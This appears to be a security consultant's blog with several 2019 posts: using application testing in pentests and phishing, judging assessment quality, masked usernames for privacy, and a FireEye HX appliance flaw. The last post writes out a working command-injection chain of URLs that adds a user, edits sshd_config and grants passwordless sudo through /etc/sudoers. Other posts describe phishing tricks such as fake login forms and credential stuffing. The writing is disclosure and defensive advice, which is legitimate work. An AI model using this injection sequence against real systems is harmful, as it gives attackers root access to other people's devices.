June 25, 2019

One-Two Punch: Using AppSec to Up Your Pentests and Phishing Gigs

Let's Get Ready to Rumble!

In this corner we have the previous InfoSec champion of the world, penetration testing.  Pentesting is no stranger in the Cybersecurity space.  In the other, and also popular, dynamic application security testing.  These are not the same, but have you considered using AppSec to enhance your existing penetration testing and phishing engagements?  Instead of viewing these consulting services as distinct, isolated components, AppSec can be a great multiplier when teamed up with pentesting/red teaming and  phishing.  The result is a more comprehensive, holistic view of the environment and can lead to better results in the other red team activities.

I'm writing this blog because it's not always obvious to pentesters and I often find critical web vulnerabilities that were missed by other teams.  AppSec seems to be the path less traveled, especially when the engagement isn't sold specifically as a static or dynamic application security gig.  The client is expecting that punch to the head, the vulnerability scan and the Man-in-the-Middle attack.  They're not expecting that left hook, the external command injection vulnerability on their HR server.  It can be the difference between a knockout (KO) and a total knockout (TKO) report for the client.  Just ask King Hippo.

Round 1: Penetration Testing & Red Team (Physical)

Fortunately for you, dear reader, I decided not to go into full-on story mode with this blog.  I'll cite some examples at a high level that I've experienced personally but for the most part I'll keep it short and simple.  There are multiple instances I've experienced while doing either penetration testing or red team activities where AppSec made the difference between a successful engagement and a so-so one.  You might be thinking, "Well my vulnerability scanners support application testing".  True, but they typically aren't very comprehensive.  Sorry, they just aren't.  (Looking at you, Tenable!)

Traditional Penetration Testing

The issues below are just some examples of web findings I've come across that aided with my penetration tests in the past:

  • SQL Injection (SQLi)
  • Local File Include (LFI)
  • Server Side Request Forgery (SSRF)
  • Unrestricted File Uploads (Web Shells, Hashes, etc)
  • Misconfigured Web Services / Information Disclosure (Directory Listing, Verbose Error Messages, etc)

I was once doing a pentest for a new client who was big on rotating their security vendors annually.  Although I support having a fresh set of eyes working on your environment each time, I think there's some value in security professionals knowing your network and business.  As a manager I strongly believed in rotating the lead internally for each recurring engagement.  I digress..

This one particular environment was somewhat mature from a security perspective and had regular vulnerability scanning and penetration testing performed on their external perimeter.  Not surprisingly, I wasn't able to find anything worthwhile to leverage in order to gain access to the Internal environment and my go-to (phishing) wasn't in scope.  Instead, I used the leftover time I had available to do some application security testing in Burp Suite Professional.  Using my nmap/Nessus host and service discovery results, I sucked the web services into Burp's sitemap and started testing.  It wasn't long until I found unauthenticated SQL injection with os-shell access.  The service was running as an elevated account, so from here it was an easy win from an internal testing perspective.

Had the web applications been tested by the prior security firm this wouldn't have happened and I would likely have struggled to find any worthwhile results during the engagement.  I've seen the same thing with LFI for gaining access to credentials, SSRF to access sensitive internal systems that aren't exposed publicly, unrestricted file uploads leading to web shells and NTLMv2 hash leaks, and misconfigured web services resulting in sensitive information disclosure by means of directory listing and verbose error messages.  I've also seen directory listings that exposed SQL backup files and htaccess files with credentials or hashes in them.  I'm sure I'm not alone here..

Red Team / Physical Penetration Testing / Physical Social Engineering

These engagements can be really fun.  Typically there's a lot of recon and planning that goes on prior to an on-site activity.  Here are just a few of the things I've seen via web applications that could come in really handy during a red team engagement;

  • Physical Access Control Systems (Default or Weak Credentials, Auth Bypass, etc)
  • Access and Control of Camera / Security Systems
  • Access Codes for Doors / Badges
  • Building and Cubicle Diagrams

As you can imagine, having someone on your team who can give you access to the facilities while you're physically on-site doing a red team can come in really handy.  A remote teammate or even you yourself with an Internet connected device could remotely open garage doors, unlock interior doors, and disable the cameras to go undetected, Mission Impossible style!  I've accessed building codes and cubicle layouts just from unauthenticated directory listing vulns on publicly facing web servers before!


  • HTTP_Screenshot (SpiderLabs)
This is an oldie but a goodie.  If you can get past the dependencies to install successfully (PhantomJS, etc) then it's worth it.  This is an Nmap NSE script, so you can run it during host and service enumeration to get a separate image file (PNG) created for each web service, from the perspective of a browser.  I always use this for penetration tests so I can quickly look through the web services to determine if there's a web portal I want to target manually.  This is especially useful when your target is a web development or web hosting company and there are a good deal of web services in the environment.
  • Burp Importer
I love this one.  On my team we use Nessus as one of many tools in our arsenal, but really leverage it mostly for host and service discovery.  The .nessus file type that you can export is really just an XML file underneath the hood.  This Burp Suite Professional Extender plugin is really nice in that it imports all relevant web services by IP and Port into the Burp Sitemap via the Nessus output.  It makes adding them to your Target and spidering/scanning really quick and convenient.
  • DirBuster / Burp Content Discovery
Because most web services detected will be by the IP address and port, the default web path may not be known.  Instead, you may get a default IIS/Apache landing page or a 403 Forbidden response code.  Even if you do get a valid page, it's possible there are other "hidden" paths or files uploaded to the web directory that shouldn't be accessible, so using a tool like Burp's Content Discovery or OWASP's DirBuster is a great way to find what others may have missed. 
  • WPScan
This is true for any Content Management System (CMS), but Wordpress especially is a goldmine for security issues, typically due to a lack of patching in regards to libraries, themes, and plugins.  WPScan is an excellent tool for quickly identifying the version and the vulnerable components as well as enumerating and brute forcing user accounts.

Round 2: Phishing

I never do phishing without doing some AppSec up front first.  It's come in handy more times than I care to count.  Most AppSec vulnerabilities that are useful for phishing involve being able to host content on the target's own environment so that URLs can be crafted to look like they originate from the legitimate domain.  Here are the ones I'm specifically looking for:
  • Open Redirects
Open Redirect vulnerabilities (via GET requests) allow the attacker to craft a URL that originates from the target domain but redirects via a 302 response code to a third party domain of their choosing. This technique is used by attackers in the real-world often and for good reason, it’s very difficult for a user, even with security awareness training, to spot the fake request since they recognize the domain. This, and the techniques below, often sail right past any web content filters and spam filters as well. Attackers can even obfuscate the redirect parameters at the end of the URI by using URL encoding, making it that much more difficult to spot as a fake.
  • Unrestricted File Upload + Indirect Object Reference (IDOR)
During a penetration test for a large university, I leveraged a combination attack where the school had student printing services with an unrestricted file upload vulnerability.  I was able to bypass the client-side content-type filters to upload an HTML file instead of a DOCX file.  In addition to this, they had Indirect Object Reference issues and it was trivial for me to be able to locate and craft a URL to access my uploaded HTML file.  Compounding the issue further was the fact that no authentication was required, so what I now had was my own site hosted by the .edu domain, which is difficult to spoof otherwise since .edu top level domains are off-limits to the general public.  As you can imagine, it was easy from here to set up a fake login form that posted credentials to my own third party site and redirect the unknowing victim on to their post-authenticated resource.
  • Cross Site Scripting (XSS)
Cross Site Scripting vulnerabilities are yet another way to control the content hosted on the phishing recipient's own domain.  By injecting HTML into the page by means of XSS, it is possible to alter the content of forms.  Additionally if the X-Frame-Options security header is missing in the web service's configuration settings, it's possible to create a full-frame iframe and completely redesign the vulnerable target site, hosting your own content.  If this is stored or reflected XSS you can craft a URL to your page and email the link to your victim.
  • Remote File Include (RFI)
RFI vulnerabilities are ways to include, or reference, external resources.  Sometimes this can be JavaScript, server-side scripting pages, or just a static HTML page.  RFI is another example of potential content modification, making it possible to craft a URL originating from the legitimate victim's domain but actually pulling content from an attacker-controlled server.

DING DING!  And Our Winner Is...

Hopefully this blog serves to help those who don't typically take an in-depth look at web applications during phishing or penetration testing activities.  If you already do this, great!  Keep it up!  I likely missed some examples and vulnerabilities that can be used in this manner, so please let me know if you have something to add so we can all improve. 😃  Dynamic Application Security Testing can stand on it's own as an excellent service, but it's unique in that it can also serve as a teammate to these other services, much like Mickey is to Rocky.  Until next time!  (Cue Eye of the Tiger Music)

- Curtis Brazzell

June 06, 2019

Not Just a Vuln Scan - Are You Receiving/Providing Quality Security Assessments?


Having a diverse background in Information Security has given me what I think is a unique perspective on both the receiving end and the giving end of technical security assessments.  In sales support roles, I'm always trying to help understand and get to the bottom of what it is exactly that our customer is most in need of.  There's something really rewarding in being able to translate and traverse the middle ground between technical jargon and bridging the gap between sales and executive-level decision makers.  It may sound cliche to say, but I honest-to-goodness really have a passion for helping people find the most value in these assessments and to walk away with them being more secure than they were before engaging with our team.

Similarly, it really irks me to my core when I come across a statement of work or the results of a previous assessment and it was performed in a way that does not maximize the effectiveness of said assessment.  With so many technical service offerings available and different organizations providing these services, it's hard to fault the customer or even the sales person who may simply struggle to understand them fully.  Perhaps there's a limited budget available and services weren't properly prioritized.  This is why it's so important to have a technical resource available during the beginning phases of sales conversations, even though most of us in this field just like to focus on delivery.  Today, just about everyone offers a Penetration Test but testing methodologies are not always standardized and sadly, some aren't even a pentest by definition!  

In this blog I hope to lay out some ways in which as a customer you can help ensure you're getting a quality assessment.  If you're a technical resource, I also hope to help outline ways in which you can make sure you're offering the right assessment and delivering consistent, actionable results which are valuable to your customer.

Some Definitions

Since I mentioned penetration testing, let's go there.  A question I often get, as I imagine most of you readers do as well, is, "What is the difference between a penetration test and a vulnerability scan?".  Don't feel bad asking this if you don't know, because sadly, many sales and technical people offering theses services don't seem to know this either.  There's also red teaming.  It's important to know what you're getting for your money but even more critical when dealing with PCI, because a vulnerability scan won't fulfill the council's requirements and could leave you failing compliance.

I'm probably going to over-simplify this definition for many, but simply put, a vulnerability scan is a passive or active scan of hosts and services to identify vulnerabilities and their severity, impact, and risk to the organization.  There is a lot of value in a vulnerability scan, as it helps you proactively identify and resolve potential patching deficiencies and configuration issues before an attacker may.  It also compliments your patch management process to ensure patches aren't being missed.  However, this by itself, it not a pentest.

A traditional network penetration test (pentest) is the act of exploiting or validating these vulnerabilities with the intent to demonstrate the impact to the organization.  Other tools and techniques can be used to simulate what an attacker may do, going further than just a single scan.  It's worth noting that both vulnerability scans and penetration tests may or may not include web applications.  Some focus on web applications specifically, often referred to as a "Web Application Pentest" or an "Application Security Test".

Lastly, a red team is essentially a penetration test but with the intent of simulating an attacker targeting the environment directly.  This is often done in an opsec friendly way to "stay under the radar" and avoid detection from defensive teams and technologies.  There's also more reconnaissance up front since the scope and access to the environment isn't likely to be provided by the customer.


Now we should all know at a high level what the differences are between these services.  However, you'll see that not all pentests are created equal.  If you're looking at penetration testing quotes keep in mind that you're most likely not comparing apples to apples, so going with the most affordable doesn't necessarily mean it will satisfy all of your requirements.  Now, if you're looking to "check a box" to meet compliance regulatory requirements or to satisfy your customer requests, you may be okay with a basic "out of the box" assessment.  Keep in mind that there are firms (I've seen the service contracts) that offer a vulnerability assessment but call it a penetration test in order to offer competitive pricing, I can only assume.  If you come across one of them, please point them to this blog. 😉


Something I came across recently was an outsourced pentest that had already been sold.  It's not uncommon to find a limited scope, with the intent to do a sampling of assets in the environment for budget or time constraints.  I have my own opinion about sampling when it comes to penetration testing (don't do it!).  Essentially an attacker will often find the easiest path in, the weakest link.  If you miss it because you didn't look at everything at least once, you're not doing yourself any favors.  This particular SOW stated that about 5% of the environment would be tested every quarter, for a year.  This included vulnerability scans as well, with the same scope.  

I understand wanting to limit the cost, but in this situation it would be better to take that same investment and put it towards a vulnerability scan for the ENTIRE environment, then focus the penetration testing on critical assets and the highest severity findings from the vulnerability assessment.  If it can only be done twice a year for the pentest, that's better than four very limited tests.  The way this was set up, they'll never have a complete picture of their environment at any one point in time.  Had I been involved from the beginning or this was Pondurance offering the service, I would have made these suggestions to the customer in a pre-sales conversation.

Frequency of Testing

I just touched on it in the last paragraph, but the frequency of testing can play a role in the thoroughness and efficiency of an assessment.  It is commonly recommended to perform a penetration test about twice a year.  This is due to the dynamic nature of enterprise environments and the frequency of security vulnerabilities that are introduced into any system.  How much is too much though?  I'd rather see a comprehensive penetration test once a year than two or even four "budget" pentests.  Attackers are financially motivated and if targeting a specific organization, time is often not a constraint for them.  Consultants on the other hand, are.  A good penetration tester will make the best use of their time, manually digging and looking for unique opportunities to move laterally and compromise credentials and hosts along the way.

If you decide you do want frequent tests, make sure you're not being over-charged either.  The first assessment should have more time allocated to it with subsequent ones benefiting from familiarity and experience with the environment gained.

Maturity / Security Posture

Another common gotcha I see is when a customer or the sales person tries to put the proverbial cart before the horse.  You can't run before you can walk.. I'll spare you the rest. 😃  Sometimes I wonder what my own sales team thinks when I'm in a scoping meeting and I'm actively reducing the scope of our services.  Fortunately, my team at Pondurance is as passionate as I am about helping our customers so they've always been cool (at least in person!) about my stepping in and altering course.  Many customers bring this on themselves, assuming the best place to start in their security journey is to go all out and do a red team assessment.  

I often offer a lower cost but more effective first step, such as a security architecture review (gap analysis) or perhaps a vulnerability management program.  Similarly, we offer a penetration test with every vulnerability management program offering.  Many customers initially want the pentest first, followed by monthly external scans and quarterly internal scans.  I always push back on this and instead, suggest we do the pentest at the end of the assessment.  What value is there in an easy pentest, demonstrating the environment is full of holes?  It's like shooting fish in a barrel, an easy win for the tester.  Wouldn't there be so much more value in waiting a year while the customer receives their scan results and work on remediation throughout that time?  Then, when they feel they've done everything they can to protect themselves we test that defense by simulating a real-world attack.

Things to Look For

Pre-Engagement Red Flags

One of the earliest indicators when assessing a new partner for security assessments is the questionnaire.  This is the document, or form, that the sales representative uses to help scope the engagement appropriately.  This document should be pretty telling for how and where they put their emphasis on time.  While true that a number of IP addresses or URLs help provide a baseline estimate for determining how much time an assessment may take, there should be follow-up qualifying questions to gain more context around those.  How are those accessible?  Does a /24 subnet REALLY have all 254 IP addresses in use, or are you paying too much when there are just a handful of hosts within that?

Are they simply quoting you for everything you ask for or are they wanting to discuss what your end goals are with you in order to better serve your needs?  This also shouldn't be a meeting to throw more stuff at you, but rather a conversation about the bigger picture to ensure the right services can be offered.  This can result in a reduction in scope, as I mentioned above.  If it's right for the customer, it should be right for the firm.

Ask about testing methodologies and frameworks.  Does their testing include Manual testing?  Are they following a standard process such as the Penetration Testing Execution Standard (PTES)?  Is there a Quality Assurance component for both the technical work as well as the deliverable?  What does the deliverable look like?  Can you see a redacted version?  Are their reports actionable with clear recommendations and not just a regurgitation of all of the issues you'll be facing in your copy?

Lastly, and probably most obvious, is the Statement of Work (SOW).  Does this contract clearly define the testing process and expected deliverable formats?  Does it specify the project management component?  Exactly how much time is dedicated to manual testing vs automated scanning.  Are they charging time for tools to run?  Are compliance tests called out for their specific requirements?  Is retesting something you're expecting and is it a separate line item?  What are their data retention periods?  There have been some big security vendors in the news recently for breaches that resulted in sensitive client data being exposed.  *cough* Hacking Team *cough*

Engagement Red Flags

Once the engagement is sold and there's a kickoff meeting to discuss expectations around timing, the testing process, and delivery, do you discuss these things in detail?  Are the rules of engagement specifically called out and discussed in depth?  

Something I've found from my experience as a Systems Administrator and being on the receiving end of a penetration test, is that you may have certain expectations for findings.  For example, I was at an organization where we had certain service accounts we knew needed to be transitioned, as well as some unsupported operating systems we had scheduled to retire.  I specifically looked for these results on the penetration test report as a quick sanity check to make sure they were at least finding the low hanging fruit.

Ironically, as a tester I'm always concerned the client is doing the same to me, and they should!  It's a great way to check my work and it's a challenge to make sure I try to find everything I can.  No pentester can ever find everything, but again, the low hanging fruit should be discovered and exploited if possible.  I wonder how many of our customers have had honeypots and I just didn't know it. 😅  Although this could be seen as a waste of time, it's yet another way to measure the effectiveness of your red team.  I've also been pitted against a blue team SOC and blacklisting security devices, which made me really think carefully about how I was going to do my passive information gathering and fly under the radar.  Now we get into purple-team operations where we can test the effectiveness of both teams and use the results as a training opportunity for each!

Post-Engagement Red Flags for Future Consideration

It may be difficult to determine the quality of the test based on the results alone.  After all, the clients aren't typically as technical in the same areas as the company providing the testing services.  However, the quality of the report should be obvious.  Do they do a good job of breaking down the main issues in a prioritized, easy to understand executive summary?  Does the report also give enough technical detail so that the responding IT department can resolve the issues being addressed?  

Does their deliverable contain screenshots as evidence of the exploited vulnerabilities and are they effective in demonstrating the risk posed by them?  Are there other supporting data files from tool outputs, such as vulnerability scan dumps, tool state files, and raw stdout?  Are they willing to share a list of all of the tools that were used during the assessment?  Part of the value in the assessment may be the education of tools and processes which can be used in internal training.  A big part of what I do in Dynamic Application Security Assessments is to provide Burp Suite Professional project state files so that the developers can load the findings into their own tools and replay the payloads to verify that their findings were resolved on their own.  I've even had the sales team in some instances add in an ad-hoc training opportunity for an entire team, tacked on to the end of the review meetings.

Speaking of review meetings, this in my opinion, is the most valuable part of the engagement for the customer.  This should be offered a week or two after the results are provided, to allow time for the customer to digest and form questions.  Are they conducting these as personally as possible?  These should be done face to face, when feasible, and should be an open-floor presentation style to allow for healthy back-and-forth dialogue.  It's an opportunity to really utilize those advisory resources that the consultancy has to offer by asking questions and making sure everyone's on the same page in regards to remediation, etc.  Lastly, is the project closed immediately after the review meeting and the invoice is paid, or do they offer to answer lingering questions afterwards?  I always personally offer this, knowing there may not be time available in the budget to charge to because I see the value in helping customers who in all likelihood, won't get around to resolving the huge list of issues you dumped into their laps until after the project is finished.


This is by no means a comprehensive list of things to do and look for when shopping for or offering security services.  These are just a few things I see regularly and since I have a passion for making sure people get the most "bang for their buck", I wanted to share with the community as well.  I think we can all do a better job as the technical delivery and sales teams to meet our customer's needs, and I strongly believe developing that quality reputation goes a long way in the overall success of the business.  A lot of that comes down to communication up front, and not assuming our customers know what's best for themselves.  We need to listen to them if they want something specific, but they're also hiring us to be their trusted advisors.

Please share any other thoughts and ideas!  I'd love to hear how people are testing their testers.  😄

- Curtis Brazzell

May 01, 2019

OSINT Recon Great? - Unique Usernames Are Better Than Unique Passwords

Using Blur to Create Unique Emails/Usernames


Happy World Password Day! Yes, this is an opinion piece. No, I’m not saying passwords are unimportant. The title is meant to be bold to encourage debate and to bring awareness to the topic. If anything, I believe they’re equally important as passwords when it comes to privacy and security. This is something I’ve been practicing personally now for ten years and it has worked well for me. Please hear me out and wait to tell me how wrong I am until after you’ve read the entire article. 😛 Passwords have been over-talked in the information security space to, quite literally, the brink of extinction. We still have to live in a world where credentials are the primary form of authentication online, for now. Big steps are being taken to get rid of the need for passwords but they’re here to stay for a while. Sorry passwords, I know today is your day.

Credentials are typically comprised of an email address or username, a password, and ideally, another form of identification such as a security token or push notification known as Two-Factor Authentication (2FA).  So why then are we always talking about passwords and 2FA?  We almost never talk about usernames and in my opinion, they're just as important in a security context if not more-so than their notorious counterpart.  They're like the R2D2 of authentication when C3PO always gets the gold!  (Auth-2D2)

Please understand me, I'm certainly not advocating we use weak passwords just that the importance of usernames is often overlooked.

R2 Authenticating Into Jabba's Palace

Now that your eyes have returned to their normal, non-rolled position, let's talk about why I feel this way.  Hint: It's OSINT


I've previously spoken about Open-Source Intelligence (OSINT) tools and the reconnaissance phase in my Phishing article so I'll do my best to avoid any redundancies there.  A lot of those tools are designed to target a company or a domain first and then find information on individuals associated it.  However, sometimes an attacker may be targeting an individual instead of an organization from the start.  Popular targets in the real world are usually victims who may have personal connections to the attacker or are high profile people such as celebrities or politicians.  The technical goal of the attacker may be to gain unauthorized access to resources as that individual or to violate their privacy by discovering browsing habits and sites they belong to.  The end goal could be to humiliate and expose their victim or to financially profit from this access.  I'll admit in my past I had to put the grey-hat back on and dig up a LinkedIn breach hash, crack it, and use Facebook to SSO into other accounts in order to geo-locate an IP address for someone in the family who had gone missing.  We were concerned for their safety, truly.

By now, just about everyone who uses the Internet knows that strong passwords are a better idea than using "123456" for their Chase account's password.  This has been a long, brutal learning lesson and some people are still getting caught up to speed.  A newer but still relatively old concept in security is to use unique passwords that are different for each site you have an account on.  This is great, as long as it's done properly.  Using a password manager instead of 20 post-it notes on your desk is the preferred way to do this, in case you were wondering.  (I, like many others before me, have seen this in physical penetration testing engagements!)  If this is you, crumble them up after converting them to a password vault like KeePass, 1Password, LastPass, etc and throw them in the shredder.  For the rest of you, great job on keeping your passwords safe and unique!

Great!  Now that all of us have a different set of credentials on every site we belong to, let's talk about why it's important to do this.  I'll keep it brief because it's not a new concept but I feel it's worth explaining due to the importance of the topic.  "Credential Stuffing" is a term used when an attacker gains access to a list of usernames and passwords, typically through a breach leak, and attempts to match these up against other sites and services to see if people are using password reuse.  Not us!  However, many people do and these attackers have tools such as Snipr which can pretty quickly and effectively check what other sites those credentials work on.  Sites such as haveibeenpwned.com allow users to check if and even be alerted in the event that their accounts have been compromised.  If someone is targeting you specifically, the same technique applies except they won't be looking for any connect to be letting them in, they'll be using your leaked password.

HIBP Breach Leak Lookup by Email

Someone using a credential stuffing tool or a number of OSINT tools can still learn a lot of information about you if they're trying to build an online profile of their target.  Think about it, your email address or username is likely to be the same on every website you are registered with.  After all, the username just identifies you.  It's your password that verifies your authenticity, or is supposed to, and says you are who you say you are.  Would you care if all of the sites you're registered on were publicly searchable by anyone who wanted to look into your life?  People could build a pretty good profile of you such as if you go to church, where you bank, what hobbies you have, groups you belong to, social media accounts, etc.  Maybe you don't want that all out there?  The Internet is not forgiving after all, it archives a mind-boggling amount and has an almost infinite retention period.  Just Google your email address and see what pops up and that's just what a non-attacker would use to dive into your story.  The recent Ashley Madison scandal comes to mind and the people who were "outed" because they didn't expect a Cyber Security breach to give them away.  Having complex passwords didn't help them.  It's not that I'm condoning this service, but I believe in privacy for all.  Why not create "throwaways" for every site you belong to?

Usernames and email addresses aren't necessarily synonymous.  Maybe I want my username to be publicly known for a social media account.  For example, my Twitter username is @CurtBraz.  Anyone knows that and I don't want to mask my identify there.  That's a risk I choose.  However, I still have a uniquely masked email address that's required for me to log in, in addition to a strong and unique password.  If someone tries to brute force my password they would need to know my email address, which shouldn't be accessible in most cases.  Even if someone got this for some reason and they wanted to get into my email account, they have no idea what my underlying real email is.

If my password wasn't unique and was re-used you'd still run into the same problem as an attacker.  If you were staring at a breach list of credentials you might have my password for Twitter, but you couldn't use that anywhere else I have an account even if it's the same password I use everywhere.  This is the point I hope to make.

Snipr Config Hits

Recommendations and Conclusion

So what can we do to protect our privacy?  Something we always preach from an Application Security perspective is that sites should not disclose if a username exists if a password is incorrect or a reset request is initiated.  Instead, it should respond with a generic message like, "This username or password combination does not match any known records".  That being said, a lot of popular sites don't follow this practice.  Captcha isn't foolproof, but is another deterrent against bots or scripts attempting to automate these attacks.  For any developers or site administrators reading this, you can help your users by following these simple practices.  Additionally, content from forums and discussion threads are spidered and indexed by search engines and can pick up users this way as well.

This advice is for everyone else who's a "user".  Consider using unique, unidentifiable usernames and email addresses when registering online.  Some people take it even further, depending on your level of privacy needs, and "mask" other information such as credit cards, names, and physical addresses.   For the purpose of this blog I'm only referring to usernames and emails.  Even if your password is disclosed in a breach and you are an avid password reuser, no one will know which account is yours to try the password against.  Of course they could still do a dictionary attack and force their way in eventually, so that's why it's good to follow both practices.  Also, a unique email or username as opposed to only a unique password makes it extremely difficult to target you as having an account on that site.  If I were to take your one known email address and run it through an OSINT tool, I would only find that one site you belong to.  I wouldn't get a pretty visual map like I do in Maltego to know what other services I can try my leaked credentials out on.

Maltego Example of User Recon

I personally use a browser plugin called "Blur" (formerly known as Do Not Track) which does an awesome job of integrating into Chrome form fields and offering to "mask my email".  See the image at the top of this article for an example of creating a new account on AWS.  I use the same format for usernames.  I then leverage KeePass for unique passwords but you can use any password manager you like.. even Blur or your browser itself.  Most password managers will reference the HIBP API and make sure your passwords themselves haven't been in a breach thus far.  This allows me to quickly and easily create throwaway emails that I can use for authentication but it can also protect my real email.  As a plus, it has the additional benefit of effectively cutting off unwanted spam by turning off the forwarding service and blocking trackers.  There are other services you can use for disposable email address and username generation, such as Guerrella Mail.  Even Gmail allows you to create email aliases by simply adding a plus sign.  If your email address is curtis.brazzell@gmail.com, you can create one on-the-fly at a cash register in a store such as curtis.brazzell+gamestop@gmail.com and your emails will still be delivered.  What you've effectively done is create a unique account that hackers will not easily recognize as yours in a breach list but at the same time it's recognizable to you.  You can also determine what sources are sharing your address with third parties this way!  Of course, someone could figure out your naming convention, so you may want something more random.

My KeePass Database 
(Now I'll Have to Change it Again) 😋

Guerrilla Mail Disposable Emails 
(Shark Lasers is a Freaking Awesome Domain, BTW)

Blocked Blur Email

With the advent of open and centralized authentication services like oauth and auth0, things are changing a bit.  There's still a balance in my mind for using these services.  On one hand all of your memberships are tied into one or a few services (Facebook, Twitter, Google, etc) and as long as that account is secure, your others should be as well.  Registering this way is one less username and password you have to deal with.  On the other hand, you're putting all of your eggs in one basket when you think about account takeover and you're using the same username everywhere.  There's always the potential that organization could be breached itself, even Google!  My personal approach is to mix it up some and use Single Sign On (SSO) for less important resources and for more private ones I register directly with the site.

Because a unique email makes it difficult for an attacker to brute force my account in much the same way a password does and because it also has the added benefit of making it difficult to target or identify me, I think it's just as important if not more-so than having a uniquely strong password.  It's a form of security by obscurity.  Again, both are recommended, but I think unique and complex usernames should be a standard, something I rarely see today.  Security is all about layering, and although I know security by obscurity isn't the solution, it's yet another layer to strengthen your security posture if used properly.

As always, I encourage a discussion and healthy debate on the topic.  Please let me know why you do or don't agree!  I do these blogs to help the community but also to advance my own understanding by hearing from you knowledgeable readers!  Thanks so much!

- Curtis Brazzell

April 29, 2019

Real Trojan Horses - A Case for Independently Testing Third Party Appliances


Would you plug a device into your DMZ or trusted server VLAN that someone handed you without looking at it first?  This is the very definition of a rogue device, after-all.  You probably want to have some control over or at least visibility into the device to know if operating system and software packages are patched, as part of your patch management program.  Before you answer no, take a step back.  It's possible you've already done this within your corporate and personal home network.  

We put a lot of faith in our vendors, especially ones that are supposed to help keep us more secure.  These third party appliances and software are typically closed-source and proprietary.  You're probably thinking, "Well I include the private IP address in-scope for my recurring vulnerability scans so I'm good, right?".  I would commend you for doing this, but I would argue that looking at these devices and software (without source) from this perspective is the equivalent of doing an External scan.  You're only seeing vulnerabilities from the available services or front-end code, not the underlying operating system or software packages that may not be patched, are configured incorrectly, etc.

Maybe now you're thinking, "Well I can trust security vendors because they know better, right?".  (thought no one, ever)  Unfortunately, from my experience, the answer is no and I'll share some of my experiences below.  Security appliances such as Firewalls and Intrusion Detection Systems have made simple security mistakes that may shock you, or not.  Just take the recent Cisco ASA default backdoor credentials as an example.  These vendors should know better!  That being said, we don't all practice what we preach and this may be an opportunity for even us security professionals to take a look at our processes and baseline standards.  A lot of penetration testing firms even deploy physical devices or virtual machines that allow them to do remote testing, but without a plan to update or remove these when not in use they may become outdated and pose a new security threat to the organization they're trying to help protect.

Hardware appliances are especially concerning because what you see from your own network is the "outside" perimeter of that device and it's usually locked down to prevent customers from getting direct access to the underlying system.  It's a little like seeing the tip of the iceberg and hoping the majority of the mass below the water won't sink your ship.  Then you might have a Titanic issue on your hands.. 😬

"Iceberg, Straight Ahead!"


The following are some of my experiences.  This is not a very complete list, as we are constantly coming across issues during penetration testing exercises.  These are but a few notable examples from my personal experience which are a few years old now but I feel make my point.

Security Appliances
  • FireEye HX
A few years back I was tasked with implementing and administering a (then Mandiant) FireEye security appliance, their HX product.  The 2U rack server was packaged up nicely and a web interface allowed for the provisioning and administration of the device on the customer's network.  CentOS was the underlying operating system, but you had to leverage FireEye's support service if there was a need to SSH into it for any reason, which they would do so through a screen share.

I could understand this at the time, their "bread and butter" were these Indicators of Compromise (IOC) threat intelligence rules that would download and live physically on the filesystem, as well as their PHP code which made up the user interface experience and background scripts.

I then got the system up and running and a Qualys network vulnerability scan came back relatively clean.  As I began poking around on the system, specifically in the "Tools" section, I noticed there was a "Ping" and "Trace Route" feature.  You could specify an IP and see the output of the tool in the web browser.  Neat!  Well, not so fast.. I quickly realized Command Injection was possible after specifying a simple semicolon.  This seemed to result in an XML parsing error with the standard out at the bottom!


Naturally, the web service was running as root.  You heard that correctly, a security vendor was running the Apache web service as root.  I can't even.. 

This is when I finally got the opportunity to poke my head under water and take a look at the rest of that iceberg.  With a series of commands, I was able to create an SSH user with sudoers rights :

https://[HX_APPLIANCE]:3443/script/NEI_ModuleDispatch.php?module=NEI_Network&function=HapiSysCommand&cmd=1&data=~|~|localhost,; useradd -m -p PASSWORD USER
https://[HX_APPLIANCE]:3443/script/NEI_ModuleDispatch.php?module=NEI_Network&function=HapiSysCommand&cmd=1&data=~|~|localhost,; cp /etc/ssh/sshd_config /etc/ssh/sshd_configBACKUP
https://[HX_APPLIANCE]:3443/script/NEI_ModuleDispatch.php?module=NEI_Network&function=HapiSysCommand&cmd=1&data=~|~|localhost,; echo "AllowUsers USER” >> /etc/ssh/sshd_config
https://[HX_APPLIANCE]:3443/script/NEI_ModuleDispatch.php?module=NEI_Network&function=HapiSysCommand&cmd=1&data=~|~|localhost,; cp /etc/sudoers /etc/sudoersBACKUP
https://[HX_APPLIANCE]:3443/script/NEI_ModuleDispatch.php?module=NEI_Network&function=HapiSysCommand&cmd=1&data=~|~|localhost,; echo “USER ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
https://[HX_APPLIANCE]:3443/script/NEI_ModuleDispatch.php?module=NEI_Network&function=HapiSysCommand&cmd=1&data=~|~|localhost,; service sshd restart
Nice!  I have root access directly on the appliance now.  From here I could access all sorts of information I probably wasn't supposed to see, such as IOCs, source code, and default passwords.

Mandiant IOC CVE

So now that we can see the whole "berg", what's under the hood in terms of vulnerabilities?  Surely FireEye keeps their OS and third party applications patched on a regular basis and practice good secure coding techniques!  (This is a joke, remember the "root" web service account?)  To be fair, the NEI hardware vendor may be partially to blame.

I then configured the vulnerability scanner to use SSH credentials with sudo rights and targeted the machine again.  This time, a ridiculous number of service configuration issues, OS and Third Party Patching issues, and a handful of other vulnerabilities lit up the report with Critical, High, and Medium severities that weren't visible before authentication.  I'm working on getting an image of the report for specifics and will update this blog when I do, but I no longer have that information readily available since it's been a few years now.

I then found the source code for the security web application and saw that it was written in PHP.  I ran RIPS against it, a static source code analysis tool, to identify even more vulnerabilities hidden beneath the surface.  I already knew they were using bad practices with the code injection techniques, which I had found multiple of examples of manually by this time, so I wasn't surprised RIPS found even more examples.

RIPS PHP Code Analysis Report

I don't think they wanted to exclude any vulnerabilities in the OWASP Top Ten.  Again, this is security software written by one of the largest security vendors in the world.  🙄

As you can imagine, if an attacker compromised any of these vulnerabilities as I did, they could use this as a pivot point in a larger attack, moving laterally and eventually compromising the entire network.  Because of the nature of this device, they could render the detection and agents useless and effectively deploy malware to every endpoint and escape detection.  No bueno!

The client I was working for is someone I admire in the Cyber Security community and had issues with this appliance sitting on their network in the state that it was in.  We contacted Mandiant and reported the issue, but nothing really came of it.  I was later told this likely fell through the "cracks" due to the acquisition.  Then, fast forward a couple of years later when they're now FireEye and no longer Mandiant, another researcher found the same initial flaw I did and went straight to the media with it.  It gathered a lot of attention due to FireEye not having a bug bounty program and the researcher was essentially blackmailing them by withholding other vulnerabilities.

